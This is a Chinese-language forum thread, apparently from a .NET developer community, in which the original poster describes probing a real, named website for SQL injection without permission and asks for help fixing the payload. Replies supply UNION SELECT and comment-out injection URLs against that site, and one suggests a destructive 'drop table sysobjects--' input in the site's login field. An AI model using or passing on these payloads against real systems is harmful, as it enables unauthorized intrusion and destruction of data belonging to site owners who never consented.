这个可以SQL注入网站

好奇都是要学的 2011-03-04 11:24:59
我出于好奇试了个网站,没想到真没有屏蔽SQL注入。 我不是恶意破坏,只是玩。但是没有成功

http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and select name from sysobjects where name>0 and 1= '1

返回的结果跟我想要的不一样。 没有提示哪个表转换INT出错, 希望有人提示下, 在哪拼错了

http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and 1= '1 但是这么写就对。
...全文
1221 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
第安城 2011-03-31
  • 打赏
  • 举报
回复
这个我已经可以注入了,就是猜不到表名,
你可以试试在登录的用户名框里输入
123' drop table sysobjects--
中间那个地方的sql是可以执行的
PitTroll 2011-03-05
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 javaniejian 的回复:]
后面加两 --
把后面的语句注释掉
[/Quote]
也不行的,我昨天试了。
PitTroll 2011-03-04
  • 打赏
  • 举报
回复
[Quote=引用 1 楼 callmesai 的回复:]
他后面有order by

http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' union select 0,1,2,3 from sysobjects where name>0 and '1'= '1'

可以根据这个SQL判断
[/Quote]
也有问题啊。
happy664618843 2011-03-04
  • 打赏
  • 举报
回复
callmesai 2011-03-04
  • 打赏
  • 举报
回复
他后面有order by

http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' union select 0,1,2,3 from sysobjects where name>0 and '1'= '1'

可以根据这个SQL判断
  • 打赏
  • 举报
回复
后面加两 --
把后面的语句注释掉

62,046

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧